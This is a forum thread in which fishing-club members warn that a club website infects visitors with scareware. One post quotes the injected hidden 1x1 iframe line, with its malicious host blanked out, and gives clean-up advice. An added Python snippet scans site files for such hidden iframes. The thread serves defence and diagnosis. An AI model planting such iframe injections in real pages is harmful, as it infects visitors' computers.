NFR Avoid Puget Sound Fly Fishers site (MALWARE INFECTION)

Discussion in 'Fly Fishing Forum' started by DennisE, Jul 16, 2012.

  1. DennisE

    DennisE Topwater and tying.

    Joined:
    Mar 12, 2011
    Messages:
    360
    Likes Received:
    80
    Location:
    Tacoma, Washington
    I don't know how long it will be until it gets fixed, but I strongly advise NOT trying their site. Just opening their home page will get your system infected with "Live Security Platinum". Luckily I work in IT and was using my home system, so I was able to eradicate this "Scareware" and Trojan pest. It isn't an experience I would recommend, however. This happened to me twice in the last week (including today) so they are still infected.
    I sent them a message through this site a few days ago, but got no response. I'll be going to the meeting on Thursday so I'll bring it up there.
     
  2. Flyborg

    Flyborg Active Member

    Joined:
    Mar 17, 2006
    Messages:
    2,355
    Media:
    45
    Likes Received:
    629
    Location:
    Kalama, WA
    It's an iframe injection. The offensive piece of code is in the first line generated to the client on their home page:

    Code:
    <iframe src="http://*********.in/in.cgi?55764" width="1" height="1" frameborder="0"></iframe>
    (I blocked out the actual URL)

    Tell them to change their FTP passwords and alert their ISP that they've been hit with an iframe injection. They'll also need to edit any files with the offensive piece of code. Just a quick glance tells me it's probably just on their home page; if it's being generated dynamically they'll need to find the code that's doing it, but my guess is someone just tossed a static line in there.
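
    An added example, not part of the original posts: one way to carry out the clean-up step above ("edit any files with the offensive piece of code") is to scan a copy of the web root for hidden iframes that load another host. The host names, the `SAMPLE` page and the function names are assumptions made for illustration.

```python
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# Constructed sample page; host names are placeholders, not the real site's.
SAMPLE = ('<iframe src="http://injected.example/in.cgi?1" width="1" height="1" '
          'frameborder="0"></iframe>\n<html><body>\n<iframe src="http://video.example/'
          'embed/9" width="560" height="315"></iframe>\n</body></html>\n')

def _tiny(value):  # True for a width/height of 0 or 1, e.g. "1" or "0px"
    m = re.match(r"\s*(\d+)", value or "")
    return bool(m) and int(m.group(1)) <= 1

class _IframeFinder(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        same_site = host == self.site_host or host.endswith("." + self.site_host)
        hidden = (_tiny(a.get("width")) or _tiny(a.get("height"))
                  or bool(HIDDEN_STYLE.search(a.get("style", ""))))
        if host and not same_site and hidden:
            self.hits.append((self.getpos()[0], a["src"]))

def find_hidden_iframes(html, site_host):
    """Return (line_number, src) for each hidden iframe that loads another host."""
    finder = _IframeFinder(site_host)
    finder.feed(html)
    return finder.hits

def scan_webroot(root, site_host, exts=(".html", ".htm", ".php")):
    """Walk a copy of the web root; return {path: hits} for suspect files."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_hidden_iframes(fh.read(), site_host)
                if hits:
                    report[path] = hits
    return report
```

    Visible third-party embeds and same-site frames are not reported, so every hit is worth reading by hand before the line is removed.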
     
  3. Davy

    Davy Active Member

    Joined:
    Mar 20, 2004
    Messages:
    2,031
    Media:
    119
    Likes Received:
    19
    Location:
    Silverton, OR
    that's not fun
     
  4. Flyborg

    Flyborg Active Member

    Joined:
    Mar 17, 2006
    Messages:
    2,355
    Media:
    45
    Likes Received:
    629
    Location:
    Kalama, WA
    Left untended it'll get the site blacklisted from Google, so it could be worse :) Most of these site infections happen due to weak FTP passwords, as well as hosting software vulnerabilities. Keep your passwords strong and software up to date (especially WordPress!).
     
  5. fishingcheftim

    fishingcheftim Member

    Joined:
    Nov 19, 2010
    Messages:
    207
    Media:
    1
    Likes Received:
    9
    Location:
    Seattle, Wa
    I do not know enough about this tech stuff. Yet if they have a bug why would you not just call them and tell them?
     
  6. Whitey

    Whitey Active Member

    Joined:
    Apr 13, 2004
    Messages:
    994
    Media:
    1
    Likes Received:
    183
    Location:
    Far side of the moon
    note to self: when computer breaks, call flyborg.
     
  7. Pete Bridge

    Pete Bridge Member

    Joined:
    Sep 1, 2008
    Messages:
    191
    Likes Received:
    4
    Location:
    Lake Tapps, Wa
    Every time flyborg posts on a thread, I find myself clicking his avatar and laughing my ass off... Can't get over it.
     
  8. Westfork

    Westfork Member

    Joined:
    Apr 22, 2008
    Messages:
    109
    Likes Received:
    4
    Location:
    too far west
    Changing the FTP credentials might not help much. IFRAME malware most likely occurs from SQL injection... sloppy coding, in other words.

    If the miscreant had FTP access, you'd find hundreds of redirect files.... and banners, popups, etc.

    Sanitize those database queries or people talk about you on forums like this.
     
